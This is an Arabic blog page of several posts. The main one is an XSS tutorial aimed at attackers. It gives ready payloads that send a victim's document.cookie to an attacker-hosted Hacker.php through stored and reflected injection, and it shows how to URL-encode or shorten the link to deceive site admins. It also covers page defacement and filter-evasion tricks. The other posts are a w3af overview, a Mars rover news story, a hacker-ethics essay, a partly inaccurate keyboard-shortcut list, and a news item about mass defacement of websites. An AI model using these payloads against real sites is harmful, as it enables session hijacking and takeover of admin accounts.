بحث هذه المدونة الإلكترونية

ثغرات Cross Site Scripting - xss








السلام عليكم في هده التدوينة سوف أشرح لكم عن نوع من أنواع ثغرات Web Application و هي Cross Site Scripting
 وإختصارها هو xss وعن نوعيها reflected و stored أولا نأتي لشرح هده الثغرات وهي كالتالي :
تعتمد ثغراث xss على مدخلات يتم إدخالها من طرف المخترق وهي تكون بلغة javascript أو html و يتم إدخالها  غالبا في صندوق التعاليق أو في مربع البحث وبطرق أخرى سوف ندرسها في مايلي من التدوينة أما عن سببها فهو أن المبرمجين لا يقومون بوضع أكواد تمنع من إدخال هده الإستغلالات من طرف المخترقين بالنسبة لما يخص إنتشار هده الثغرة فهو كبير جدا ويسهل الإختراق بها وعن بعض نتائج الإختراق بها فهي كالأتي:
-سرقة الكوكيز والدي يسمح لك بالدخول إلى لوحة التحكم  للموقع بدون معرفة كلمة السر
-تحويل زوار الموقع المخترق إلى موقع أخر من إختيارك وهدا مايستغله البعض في تحويل الزوار إلى مواقع ويطلبون تحميل ملفات أو برامج يوهمون الضحية بأنها
من صاحب الموقع المخترق وبالتالي تكون هده البرامج عبارة عن فيروسات تؤدي إلى إختراق أجهزتهم
-تغيير محتوى الصفحة بإدحال أكواد html كالتي نراها يوميا و بالمئات وهده تكون غالبا من طرف الأطفال الدين يسمون أنفسهم بالمحترفين
ويمكن للمخترق الدكي أن يستعمل الكثير من الطرق ليستغل هده الثغرة شر إستغلال
 نأتي الأن إلى طريقة الإختراق عن طريقها يمكن أن ندهب إلى أي تطبيق ويب  كمحركات بحث المواقع



ونجرب عليه هدا الكود   <script>
نقوم بإلقاء نضرة على الكود المصدري لصفحة


كما ترون فإن الكود تم إلحاقه كما كتبناه  أما إدا كان الموقع محميا لكتب الكود بهدا الشكل  &lt;script&gt;  
بعد أن تأكدنا أن التطبيق مصاب بالثغرة نقوم بالتأكيد أكثر عبر إدخال كود جافاسكربت  هدا <script>alert('BTS')</script>

 فيكون الناتج كالأتي  :

نعم فكما ترون  ضهر الرقم الدي وضعناه بين قوسين وهدا دليل على أن التطبيق مصاب بالثغرة

أنواع ثغرات xss :

فكما دكرنا في أول التدوينة فإن ثغرات  xss نوعين وهما 
stored وهو الأكثر خطورة بحيث يتم الإحتفاض بالكود في قاعدة البيانات فخد معي كمثال صندوق التعليقات الموجود تحت هدا الموضوع فلو كان الموقع مصابا فيمكن للمخترق أن يكتب كودا بالجافاسكربت يستطيع به أن يسرق كوكيز كل من يدخل هده الصفحة
وأشياء أخرى
reflected وهو النوع الأكثر إنتشارا بين المواقع هده الأيام يرسل الكود الضار إلى السرفر عن طريق HTTPrequest السرفر يقوم بإلحاقه بملف html و يرجع الملف وهدا ما يسمى بHTTPResponse إلى المتصفح وعندما المتصفح يفتح ملف HTML يضهر الكود المحقون للمتصفح و هدا النوع يطبق على صناديق البحث بالمواقع وتكون له أضرار كالنوع الأول 

كيف يتم سرقة الكوكيز

تستطيع سرقة الكوكيز بكل أنواع  Cross Site Scripting فكل ما تحتاجه هو ملفين الأول يكون مكتوب بلغة php مكتوب به كود يقوم بسرقة الكوكيز وأخر بصيغة txt يقوم بإستقبال الكوكيز  وتحفض به و تحتاج كدلك لإستضافة لرفع الملفين عليها وهي بكثرة و مجانية ويكون ملف php بعد الرفع بهدا الشكل  hxxp://www.YourSite.com/Hacker.php 
نقوم الأن بحقن الكود في المواقع المصابة بالstored بهدا الشكل 

<script>location.href = 'http://www.Yoursite.com/Hacker.php?cookie='+document.cookie;</script>
وبمجرد دخول admin إلى هده الصفحة فسيتم إرسال الكوكيز الخاص به عن طريق ملفHacker.php إلى الملف النصي txt  وبتغيير بسيط في اعدادات المتصفح ستتصفح الموقع المصاب وسوف تدخل الى لوحة التحكم من دون الحاجة الى معرفة كلمة السر او اليوز
لن اشرح كيفية تغيير اعدادات المتصفح ويمكنكم ان تبحثو عنها في google
اما بالنسبة للمواقع المصابة بالنوع الآخر reflected فسيكون الإستغلال مختلفا بعض الشئ بحيث نحقن الكود السابق في صناديق البحث بحيث تضهر في مكان وضع أسماء المواقع كالآتي  

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href ='http://www.Yoursite.com/Hacker.php?cookie='+document.cookie;</script>
وبعدها تقوم بحفض الكود وإرساله إلى الأدمن وبمجرد فتحه ستكون قد سرقت الكوكيز الخاص بموقعه 
ولقليل من التمويه يمكن أن تقوم بتشفير الرابط فيصبح كالتالي
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e


أو أن تجعلو الرابط مختصر فيصبح hxxp://www.tinyexample.com/rdsse23

تغيير محتوى الصفحة  

وهدا يكون فعالا في stored ولايكون فعالا في reflected بطريقة صحيحة ويمكن تطبيق الأمر الآتي 


<'';'body onload= "document.body.innerHTML='YOUr html code her>

تخطي الحماية ضد ثغرات xss

في بعض الأحيان تكون المواقع مصابة لكنها تستعمل فلاتر مثل WAF فتضهر وكأنها غير مصابة ودلك بحيث إدا قمنى بإختبار هدا الكود  <scirpt>alert("hi")</script>  والموقع يحتوي على WAF فسيكون الناتج هو هدا 
<script>alert(>xss detected<)</script>


كما ترون لقد غيرت محتوى الكود ومنعت من عمله ويمكن تخطي هده الحماية في حالتين :

تجاوز magic_quotes_gpc 

هده التعليمة تكون بملف php.ini و إدا كانت تعمل فتقوم بمنع تنفيد أي أمر به مثل هده الرموز " \ '  و يصبح مستحيل تنفيدها 
لكن هناك الحل لتجاوزها وهو تشفير الكود بASCII كأن نشفر
alert("hi");
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
كما ترون الكود لايحتوي على أي رموز هكدا سنتمكن من الإلتفاف على الحماية و يمكن كدلك إستعمال تشفير أخر كالتشفير بHEX

تجاوز الحماية بإستعمال أسلوب التشويش

بعض المواقع لاتسمح بإستعمال alert و script في مواقعها و تقوم بحضرها ويمكن الإلتفاف عليها بطرق سهلة بكتابة الكود هكدا 
<ScRipt>ALeRt("hi");</sCRipT>


أو هكدا

"><script>alert("Hi");</script>

كما يمكنكم زيارة هدا الموقع لمعرفة المزيد من الطرق http://ha.ckers.org/xss.html

كيفية الحماية من هده الثغرات 

  • كمستخدم عادي تستطيع حماية نفسك من خلال إستخدام هده الإضافة الخاصة بمتصفح موزيلا  No-Script Addon  وأيضا من خلال عدم الوثوق في الروابط القصيرة و للحماية فيمكنك مسح كل الكوكيز من على متصفحك ومن ثم تصفحها من خلال بروكسي لكي لا يلتقط المخترق الأيبي الخاص بك 
  • و كصاحب موقع فما عليك سوى إستخدام جدران نارية و سكربتات تحد من فاعلية الثغرة 
وفي الأخير أود التنويه أن كل ما دكرته ليس إلا للأغراض التعليمية وأنا لست مسؤولا عن أي شخص يستعملها لأغراض التخريب
يمكن طرح تساؤلاتكم من خلال صندوق التعليقات أسفله
شكرا للمتابعة وإلى التدوينة القادمة :)





www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : , ,

برنامج w3af لإكتشاف و إختراق تطبيقات الويب



نأتي أولا إلى التحدث عن تاريخ هدا البرنامج قليلا فهو مبرمج من طرف Andrés Riancho دو جنسية أرجُنتينية والغة المبرمج بها هدا التطبيق هي Python وهو مفتوح المصدر أما تاريخ صدور أول إصدارة منه فهي سنة 2007 مارس وعن إسمه W3af  فهو إختصار لكلمة Web Application Attack and Audit Framework كما هو ظاهر من العنوان فالبرنامج موجه لإختراق تطبيقات الويب كما يدعم عدة أنظمة لينيكس و ووندوز ماك...  البرنامج وكما يقول صاحبه يود أن يجعل منه أحسن scanner موجه لإكتشاف ثغرات تطبيقات الويب كما يحتوي على 130 plug-ins يمكن أن يعمل في سطر الأوامر كما له واجهة رسومية GUI وأرى أنها أحسن بالنسبة للمبتدئين وأسهل 

نأتي الآن إلى إمكانياته :
  • Discovery وهو للبحث عن URLs و نظام و إصدار السرفر المستضيف للموقع و أشياء أخرى
  • Audit هدا القسم يحتوي على الكثير من الأدوات لإكتشاف الثغرات مثل sqli xss lfi ...
  •  Grep في هدا القسم توجد أدوات تقوم بحفظ كل الإتصالات بينك و الموقع كحفظ الكوكيز والإيمايلات وما إلى دلك
  • Mangle لتعديلات الفورية
  • Evasion لتخطي أنظمة كشف الإختراق IDS و IPS
  •  Bruteforce في هدا القسم توجد ادوات لتخمين كلمة المرور و اليوزر لصاحب الموقع المراد اختراقه
بعد الإنتهاء من إختيار الأدوات التي تودون تجربتها على الهدف سيعطيكم البرنامج تقارير يلخص فيها كل ما وجده في حال وجود ثغرة سيعطيكم البرنامج بالظبط الرابط المصاب ويرفق الثغرة بشل لتحكم بها حقا البرنامج جد رائع و أنا من معجبيه نظرا لسهولة التي يعطيها لي في إختبار الإختراق وإختصار الوقت و الجهد ولكن مع دلك لا أنصح بالإكتفاء به فإختبار الإختراق اليدوي يكون أدق و أحسن في أغلب الأحيان
حاولت في هده التدوينة أن أعطيكم وألخص لكم مزايا هدا البرنامج فأتمنى أن تكون قد أعجبتكم ولطرح أي تساؤل ما عليكم سوى كتاته في صندوق التعليقات أسفله وشكرا :)
                                                          الموقع الرسمي للبرنامج | لتحميل البرنامج




www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : ,

«ناسا» تتلقى أول صور من المسبار «كيريوسيتي» عقب هبوطه على سطح المريخ

بعد رحلة استمرت 8 أشهر قطع خلالها 566 مليون كيلومتر قبل دخول الغلاف الجوي للمريخ بسرعة 20921 كيلومترا
واحدة من أول الصور التي أرسلها المسبار «كيريوسيتي» عن عدسة «عين السمكة» الموجودة على يسار الجزء الخلفي من المركبة. وتظهر سطح كوكب المريخ (أ.ف.ب)
مات والاس (في الوسط) مدير أنظمة الطيران في مختبر علوم المريخ والمدير الرئيسي للطيران في المختبر ديفيد أو (الثاني من اليمين) خلال الاحتفال لحظة هبوط المركبة (أ.ف.ب)
باسادينا (ولاية كاليفورنيا الأميركية): «الشرق الأوسط»
أرسل المسبار الفضائي العلمي «كيريوسيتي» أول صور من فوق سطح المريخ بعد 3 دقائق من هبوطه ليبدأ مهمة تستمر عامين للبحث عن أدلة على وجود المقومات الأساسية للحياة على الكوكب الأحمر.وقال ألين تشين، نائب مدير فريق هبوط المسبار: «لا يمكنني أن أصدق هذا. إنه أمر لا يصدق» في الوقت الذي وصلت فيه أول 3 صور للتضاريس الصخرية - إحداها تبين عجلة المركبة – إلى مركز مراقبة المهمة.
وكان المسبار قد هبط بنجاح على سطح كوكب المريخ طبقا لما أعلنه فريق وكالة الفضاء الأميركية (ناسا) في باسادينا بكاليفورنيا غرب الولايات المتحدة.
وحط المسبار فجر أمس، الاثنين، على سطح الكوكب الأحمر. وقال مسؤول في مهمة متابعة الرحلة في مختبر «جيت بروبالشن لابوراتوري» في باسادينا شرق لوس أنجليس: «تأكدت عملية الهبوط».
وحط المسبار بعيد الساعة 05:31 بتوقيت غرينتش على سطح الكوكب الأحمر.
وقد عبر المشرفون على المهمة عن فرحتهم عند الإعلان عن هبوط المسبار في ختام عملية نزول دقيقة جدا من 7 دقائق يبدو أنها تمت تماما وفق الخطة الموضوعة.
وكانت مهمة متابعة الرحلة أعلنت قبيل الساعة 05:30 بتوقيت غرينتش أنها تلقت مؤشرا أول من الروبوت قبيل دخوله الغلاف الجوي للكوكب الأحمر قبل أن تؤكد أنه تمكن من فتح مظلته بنجاح.
وصفق مراقبو المهمة في معمل الدفع النفاث قرب لوس أنجليس عندما تلقوا إشارات من مركبة تؤكد أن المسبار تمكن من الهبوط في المنطقة المخصصة.
ووصفت ناسا هذا الإنجاز بأنه أكثر الإنجازات تعقيدا في رحلات الفضاء غير المأهولة.
ومشروع «كيريوسيتي» الذي يتكلف 5.‏2 مليار دولار ويطلق عليه رسميا «المختبر العلمي للمريخ»، هو أول مهمة تتعلق بوجود حياة في الفضاء تقوم بها «ناسا» منذ مهام سفن الفضاء «فايكنغ» في السبعينات.
ويمثل هبوط المسبار على سطح المريخ انتصارا كبيرا وعلامة بارزة لـ«ناسا» التي تعاني من خفض في الميزانية وتوقف برنامج المكوك الذي استمر 30 عاما.
وقال جون هولدرين، كبير المستشارين العلميين للرئيس باراك أوباما، الذي كان يزور مختبر الإطلاق: «إنها خطوة هائلة للأمام في استكشاف الكوكب. لم يقم أحد قط بشيء من هذا القبيل.. كان أداء رائعا».
ولم يتسن على الفور التأكد من حالة المسبار الذي يعمل بالطاقة النووية، والذي يبلغ وزنه طنا واحدا لدى وصوله.
وتعتزم «ناسا» إخضاع المسبار ومعداته المعقدة - الذي وصف بأنه أول مختبر علمي متنقل كامل يرسل للعالم الخارجي - لعمليات صيانة هندسية تستغرق عدة أسابيع قبل بدء المهمة التي تستغرق عامين.
وكان هبوط المسبار تتويجا لرحلة استغرقت أكثر من 8 أشهر قطع خلالها المسبار 567 مليون كيلومتر في الفضاء منذ إطلاقه من كيب كنافيرال.
وفي واشنطن وصف الرئيس الأميركي، باراك أوباما، هبوط المسبار «كيريوسيتي» على سطح المريخ باللحظة التاريخية التي توضح التقدم الهائل في مجال اكتشاف الفضاء.
وقال أوباما: «إن الهبوط الناجح للمسبار الذي يعد المعمل الأكثر تقدما الذي يهبط على كوكب آخر يمثل تقدما غير مسبوق للتكنولوجيا سوف يمثل مصدر فخر وطني لنا في المستقبل»، وأضاف: «هذا يثبت أن أطول العقبات لا تقف أمام ما لدينا من خليط فريد من البراعة والتصميم».
وأشار أوباما إلى أن تحقيق هذا التقدم يأتي في الوقت الذي تبذل فيه أميركا جهودا لنقل مسؤولية الرحلات الفضائية للمحطة الفضائية الدولية القريبة للشركات الخاصة لكي تركز وكالة الفضاء الأميركية (ناسا) على الأهداف الأطول مدى مثل السفر للمريخ. وقال: «أهنئ وأشكر جميع رجال وسيدات (ناسا) الذين حققوا هذا الإنجاز الكبير، وإنني أتوق لمعرفة ما سيكتشفه كيريوسيتي». وأوضحت «ناسا» أن مسبار الفضاء «كيريوسيتي» نجا من هبوط صعب للغاية على سطح المريخ باستخدام تقنية لم تتم تجربتها من قبل، حيث تم إنزال المسبار إلى سطح الكوكب الأحمر بشكل يشبه نزول العنكبوت على الخيط.
وتعالت الهتافات في مختبر الدفع النفاث التابع لوكالة «ناسا» في ولاية كاليفورنيا فور هبوط المسبار على سطح المريخ، بعد مرور ما وصفت بأنها «7 دقائق من الرعب»، عندما دخلت المركبة الغلاف الجوي للكوكب وقامت بأكثر عمليات الهبوط تعقيدا حتى الآن بالنسبة لمركبة غير مأهولة.
وفي غضون دقائق، أرسل «كيريوسيتي» أولى صوره، التي يظهر فيها وقوف عجلاته بسلام على سطح المريخ.
واحتشدت الجماهير في أنحاء الولايات المتحدة، بما في ذلك ميدان تايمز في نيويورك، لمشاهدة بث مباشر لعملية الهبوط من مركز التحكم في المهمة التابع لوكالة «ناسا» ومختبر الدفع النفاث في كاليفورنيا. ويذكر أن هذه هي المرة الأولى التي يقوم بها مسبار بمناورة هبوط معقدة.
ومن المقرر أن تستمر المهمة لمدة عام مريخي على الأقل (عامان بزمن الأرض) لدراسة فوهة بركان «جال» للانتقال من البحث عن المياه إلى بحث أوسع عن وجود عناصر أخرى ضرورية للحياة مثل الكربون.
كما ستجري المهمة دراسة حول المعادن في المريخ لمعرفة طبيعة الظروف على الكوكب قبل ملايين السنين.
ومن المقرر أن يستخدم «كيريوسيتي» مجموعة واسعة من الأدوات الجديدة، إذ إنه مزود بكاميرتين مثبتتين أعلى سارية، يمكن أن يلتقط بهما المسبار صورا بانورامية ثلاثية الأبعاد، بينما يمكن إطلاق الليزر على الصخور لتحديد عناصرها الكيميائية.
كما يمكن للمسبار استخدام ذراع آلية طولها متران لفحص ما يحيطه بشكل أكثر دقة، إلى جانب حفار يسمح له بأخذ عينات من داخل الصخور. وكانت هذه المنطقة خضعت للدراسة الكثيفة بالفعل من جانب مركبات فضائية تدور حول الكوكب، ويأمل العلماء في أن يقدم «كيريوسيتي» أدلة حول احتمال وجود مياه على المريخ في الماضي. وتحتوي هذا المنطقة على طين ومواقع غنية بالكبريتات، حيث يمكن إيجاد مركبات عضوية ضرورية للحياة. وتأمل «ناسا» في إرسال مهمة مأهولة إلى المريخ في النهاية، مع استمرار المهام الروبوتية إلى أقرب الكواكب للأرض.
الجدير بالذكر أن المسبار ظل يجوب الفضاء لأكثر من 8 أشهر وقطع 566 مليون كيلومتر قبل دخول الغلاف الجوي للمريخ بسرعة 20921 كيلومترا في الساعة، أي بسرعة تزيد على سرعة الصوت 17 مرة قبل بدء الهبوط. وهبط المسبار على منطقة هبوط يطلق عليها «فوهة جال» وتقع قرب خط الاستواء للكوكب في النصف الجنوبي منه.
وأرسلت المركبة «أوديسي» التابعة لوكالة «ناسا» التي تدور حول الكوكب أول تأكيد على عملية الهبوط عبر جهاز هوائي في أستراليا. وسيمضي «كيريوسيتي» عامين في استكشاف «فوهة جال» وجبل ارتفاعه 5 كيلومترات يتكون مما يبدو أنها ترسيبات منبثقة من جوف الفوهة. وقال مدير «ناسا»، تشارلي بولدن، للصحافيين في غرفة مليئة بالمهندسين والعلماء الذين تغمرهم السعادة: «اليوم، بدأت عجلات (كيريوسيتي) في تمهيد الطريق لكي تطأ قدم الإنسان سطح المريخ».
وأضاف أن «كيريوسيتي»، أكثر المسابير تطورا على الإطلاق، «بات الآن على سطح الكوكب الأحمر، حيث سيسعى إلى الإجابة عن أسئلة قديمة حول ما إذا كانت هناك حياة على المريخ، أو ما إذا كان الكوكب يمكن أن يصلح للحياة في المستقبل».
ووصف بولدن عملية الهبوط بأنها عمل «مذهل»، مشيرا إلى أن 40 في المائة فقط من المركبات التي أرسلت إلى المريخ وصلت بنجاح.
كانت الهند قالت يوم الخميس الماضي إنها تعتزم إرسال مركبة فضائية إلى الكوكب بحلول عام 2013.
«كيريوسيتي» تحمل شريحة إلكترونية تضم عددا من مشاهير العرب
* كشف موقع قناة «العربية» على الإنترنت أن المسبار «كيريوسيتي» يحمل شريحة إلكترونية تحتوي على 15 ألف اسم تقريبا بينها عدد من مشاهير العرب في الماضي والحاضر بل وعرب عاديين طبقا للقاء الذي أجرته القناة مع الدكتور عصام حجي رئيس فريق علمي في «ناسا» يستخدم تكنولوجيا الرادار على الأرض للبحث عن المياه الجوفية في المناطق الصحراوية المشابهة للمريخ وتشارك فيه الكويت مع إيطاليا إضافة لوكالة الفضاء الأميركية وأضاف الدكتور حجي أن الشريحة الإلكترونية موجودة على المركبة بموافقة «ناسا» التي قبلت أن يضع العاملون فيها ما يرونه مناسبا من أسماء أشخاص كتكريم لهم ففي المستقبل سيعثر زوار المريخ على المركبة ويجدون الأسماء في الشريحة ويبحثون عن ماضي أصحابها ومن كانوا، وفق تعبيره.
ورفض الدكتور حجي الإفصاح عن أي اسم وضعه هو أو غيره في الشريحة، لكنه ذكر بأن الأسماء هي لمشاهير رحلوا ومعاصرين من العرب، وهم من جميع الدول العربية. وعلى أي حال فوحدها «ناسا» ستكشف عن الأسماء عما قريب، بحسب تأكيده.
وقال الدكتور حجي من مقر عمله في معمل «الدفع الصاروخي النفاث» التابع لوكالة «ناسا» في كاليفورنيا، إن وضع الأسماء هو تقليد تمارسه الوكالة لإشراك المجتمع والأشخاص عبر وضع أسمائهم وفق منظومة مفتوحة للاقتراح على موقع «ناسا».
«بوينغ» تفوز بعقد قيمته 900 مليون دولار لبناء سفينة فضاء
* ذكرت تقارير إخبارية اليوم الجمعة أن شركة «بوينغ» الأميركية للصناعات الجوية والفضائية وشركة «سبيس إكسبلوريشن تكنولوجيز كورب» فازتا بعقود بقيمة 900 مليون دولار لإنتاج سفينة فضاء قادرة على حمل رواد فضاء لصالح وكالة الفضاء والطيران الأميركية (ناسا).
وذكرت «ناسا» أن «بوينغ» حصلت على عقد قيمته 460 مليون دولار، في حين حصل «كونسورتيوم سبيس إكس» بقيادة الملياردير إيلون ماسك على عقد بقيمة 440 مليون دولار، وشركة «سيرا نيفادا كورب» على عقد بقيمة 213 مليون دولار من الوكالة الأميركية.
ونقلت وكالة «بلومبرغ» للأنباء الاقتصادية عن جون لوجسدون أستاذ علوم الفضاء ومؤسس معهد سياسات الفضاء في جامعة جورج واشنطن الأميركية أن اثنتين من الشركات سيتم اختيارهما لإنتاج سفينة فضاء قادرة على حمل أطقم المحطة الفضائية الدولية.
وأضاف: «هذه خطوة مهمة.. هناك بدائل لمكوكات الفضاء»، حيث كانت وكالة «ناسا» قد أوقفت قبل سنوات تشغيل أسطول مكوكات الفضاء التي ظلت تعمل عشرات السنين العام الماضي، وأصبحت الولايات المتحدة دون أي وسائل خاصة بها لإرسال روادها إلى الفضاء، وأصبحت تعتمد على سفن فضاء دول أخرى مثل روسيا.
وتريد الإدارة الأميركية أن يتولى القطاع الخاص تشغيل سفن الفضاء على أن تركز وكالة «ناسا» على أبحاث الوصول إلى المريخ ودراسة الكواكب.
الهند تعطى الضوء الأخضر لإطلاق مركبة فضائية إلى المريخ
* وافقت الحكومة الهندية على إرسال مركبة فضائية إلى المريخ العام القادم. وذكرت صحيفة «هندو» اليومية نقلا عن مصادر رسمية أن الحكومة الفيدرالية وافقت في ساعة متأخرة ليلة الجمعة على قيام منظمة بحوث الفضاء الهندية بإرسال مركبة إلى كوكب المريخ في نوفمبر (تشرين الثاني) 2013.
كان مسؤول في المنظمة قد صرح في وقت سابق بأن المشروع - الذي تقدر تكلفته بـ4.5 مليار روبية (نحو 80 مليون دولار) - يشمل عملية إطلاق المركبة في 26 نوفمبر 2013، والفرصة التالية للإطلاق سوف تكون في مايو (أيار) 2018.
ومن المتوقع أن توضع المركبة التي ستدور حول المريخ وتزن 1350 كيلوغراما في مدار بيضاوي فوق المريخ بحلول سبتمبر (أيلول) 2014 بعد رحلة تستمر 300 يوم من الأرض، بحسب مذكرة تم إعدادها للعرض على الحكومة. ولم يتسنَّ الاتصال بمسؤولين من وزارة العلوم للتعليق.
وجرى الإعداد للمشروع بعد المهمة التي قامت بها المركبة الهندية «تشاندرايان – 1» في عام 2008 إلى القمر، التي عثرت على دليل على وجود مياه على سطحه.
وحاولت عدة دول القيام بمهام لدراسة المريخ، وهو كوكب لديه سمات كثيرة مشابهة مع الأرض. وتحتل الهند بذلك الترتيب السادس في قائمة إرسال مركبات إلى المريخ بعد الولايات المتحدة وروسيا وأوروبا واليابان، والصين التي لم تكلل محاولتها الأولى في عام 2011 بالنجاح.



www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés :

|عقيدة الهكرز!!|


وانا ببحث عن مقالات عن التقنيه لفت نظري هذا المقال جدا فحبيت انشروه عشان نعرف الهكر بيقول ايه عن نفسه وهل فعلا الكلام الى فى المقال ده صحيح ولا لا لكم الحكم على المقال

_________________

مر الزمان مر الو
قت اقتربت اللحظة التي ننتظرها!
مر الوقت ونحن البشر ......
لم نفهم!
لم ندرك حتى!
أننا بشر نملك روحا نحن مختلفون .....
نحن نملك وعيا...
نملك فكرا..........
نملك ارادة..........
نملك رغبة من خلالها نتعلم ونصل للحقيقة....
فهل تعرف ماهي الحقيقة؟؟؟
هل تعرف من هو عدوك حقا؟؟


______________________
ان كنت قرأت الكلمات التي بالأعلى سيكون امامك خيارين وكل خيار يعتمد على اسلوبك في الحياة
الخيار الأول انك ستتمعن فيه جيدا وتعرف لماذا قلته.
الخيار الثاي انك ستعتقد انه كلام لامعنى له وربما فلسفة زائدة وهنا ستعتبر ان هذا الكلام ليس جزءا من المقال لكن اؤكد لك ان هذه الكلمات هي الموضوع كله لمن يفهمها جيدا....
_________________
أنا هكر ولست مجرم!!
عند بدايتي لتعلم الهاكينج قرأت كتابا يتحدث عن اساليب اختراق تطبيقات الويب في مقدمة الكتاب لفت انتباهي ان المؤلف يقول
"انه يعلم ان هناك من سيستغل هذه المعلومات للتخريب والتدمير لكنه يعلم جيدا انه سيصل الى مرحلة من الاسترخاء والانضباط النفسي تجعله يوجه ماتعلمه الى الطريق الصحيح."
وأيضا مازلت اتذكر كلمة كان يقولها لنا الدكتور في المحاضرات
"افضل شيء التعلم بالخبرة واسوء شيء التعلم بالتجربة"

عقيدة الهكرز!!
لقد دخل لمجال الهاكينج الكثير الألآف من الاشخاص لكن قلة فقط من فهموا هذا العلم وهذا العالم الهكر ليس مجرم عزيزي القارئ
وليس المخترق الذي يخطط لاقتحام خصوصيتك وليس اللص"الحرامي" الذي ينتظر اللحظة المناسبة للانقضاض على ماتملك من اميلات او حسابات مصرفية.
للاسف هناك اشخاص مازالت عقولهم مأسورة لسجن الجهل المليء بالافكار التافهة هناك من يريد التعلم للانتقام من فلان
وهناك من يريد التعلم لانه اعجب بشخص يحصل على دخل شهري من سرقة الحسابات المصرفية متناسيا انه هذا الشخص المعجب
لايفرق عن اللص شيئا فمالفرق بان اضع يدي في جيبك لسرقة اموالك او اخترق نظامك لاسرقها؟؟!!
هناك أيضا من يملك مايكفي من العنصرية الدينية مايجعله يبيح استخدام هذا العلم في تحطيم مواقع الاخرين وتدميرها واختراق وسرقة
من لايملكون نفس فكره اومعتقداته.
وهناك من يتعلم لاجل كلمة "أخترق" اها من هذه الكلمة وماتبثه في نفس الشخص من شعور بالسلطة والقوة والتميز عندما يذكر أحدهم انه اخترق موقع كذا او نظام كذا!
هل لاحظتم شيئا اخواني فيما قلته؟؟
هل تشاهد نشرة الاخبار ماذا تلاحظ فيها؟؟
دولة تعتدي على دولة وانسان يقتل اخيه الانسان وقيم بشرية مهمة تضيع لاجل ماذا حب السلطة حب المال حب الشهوة حب القوة والسيطرة حب الذات الانتقام الحقد والكراهية.
هل عرفت الآن لماذا اننا لاندرك أننا بشر!!
إن الفساد ياتي من ضعف الانسان حبه ورغبته للشهوة للمال السلطة كل هذا بسبب الجهل.
الجهل هو السجن الذي يحبس الروح والعقل البشري في اعماقه يقوم بسجن الانسان الذي بداخلك.
ماريد قوله نفس الاسباب هي التي تقوم بالمشاكل التي تحدث في اي زمن وفي اي مكان.
فسبب المشاكل بين الشعوب العنصرية بجميع انواعها حب السلطة والمال
نقيس على ذلك الهكرز نجد سبب اعطاء صورة خاطئة عن الهكرز نفس الاسباب ان بعض الاشخاص بسبب حب السلطة القوة المال الشهوة يستخدمون هذا العلم بشكل خاطئ.
نحن الهكرز نحمل شرف العلم ونملك الحرية لاننا تحررنا من الجهل الى نور الحقيقة.
إنها عقيدتنا الحرية والتطوير نحن لسنا مجرمون نحن علماء الحاضر والمستقبل نحن اساس العصر الحديث
هكر لاتعني اني مجرم هكر تعي انسان مبدع في اي مجال من مجالات هذه الحياة هكر يعني صاحب فكر معقد اعقد من اي مشكلة تقف امامي هكر يعني انسان فهم هذه الحياة جيدا وسخرها بالطريقة الصحيحة لصالحه وليس تسخيرها ضد اشخاص اخرين.
لن تصبح واحدا منا مهما تعلمت من علوم هذا الكون مالم تعرف هدفنا الحقيقي وتملك اخلاقنا التي من خلالها نتميز عن غيرنا
اخيرا هذه بعض اخلاق ومبادئ وافكار عقيدة الهكر أتمنى ان لاتلقي بها في الهواء كالتراب المنثور.
نصيحة:
تعلم كيف تتحلى باخلاق النفس البشرية."صدقني ليست سهلة والا ماكانت هذه المشاكل التي في عالمنا تحدث الآن




www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : , ,

|صوره ولكم التعليق !! |

|صوره ولكم التعليق !! |






www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés :

اخبار الكمبيوتر |اسرار لوحة المفاتيح :الجزء الاول|





من اسرار الكيبورد الجزء الاول

سنقوم بتقديم اشهر اختصارات الكيبورد على اجزاء واليكم الجزء الاول






ctrl+b : يقوم بترتيب ملف المفضلة عن طريق هذا الامر.


alt+f4 : أمر مفيد يقوم بإغلاق النوافذ.


alt+esc : يمكنك التنقل من نافذة الى نافذة.


alt+tab : امر مفيد جداً لك اذا كان هنالك نوافذ كثيرة مفتوح يمكنك اختيار النافذة المطلوبة.


trl+f :يمكن لك بحث في البرنامج عن الكلمة.


ctrl+s :حفظ العمل الذي قمت به.


f2: اسرع امر يمكنك من تغير اسم ملف محدد.


Ctrl + F5: تصغير نافذة الملف.


ctrl+z : يمكنك من التراجع عن اي امر قمت بتنفيذه.


ctrl+p : لتنفيذ الامر بالطباعة لبرنامج المتصفح او اي برنامج اخر.


ctrl+o : لفتح ملف من اي برنامج عن طريق هذا الامر.


ctrl+w : لاغلاق اي نافذة مفتوحة


Ctrl + F2 : معاينة الصفحة قبل الطباعة


= + Ctrl : تكبير وتصغير درجة واحدة


F4 : تكرار أخر عملية


Alt + Enter :تكرار أخر عملية


Ctrl + Y : تكرار أخر عملية.




F12 حفظ بأسم


Shift + F12 حفظ الملف


Ctrl + F2 :معاينة الصفحة قبل الطباعة.


Ctrl + P : طباعة.










www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : ,

|مجموعة إيرانية تعطل 220 موقع إسرائيلي|

|مجموعة إيرانية تعطل 220 موقع إسرائيلي|
 

استطاعت مجموعة من الشباب الإيراني تطلق على نفسها "أمن الانترنت" من اختراق 220 موقع إسرائيلي وتعطيلها بالكامل.

وقالت صحيفة "مهر" الإيرانية أن المجموعة قامت بهذا الهجوم في الذكر السنو
ية لاغتيال العالم الإيراني " داريوش رضائي نجاد".

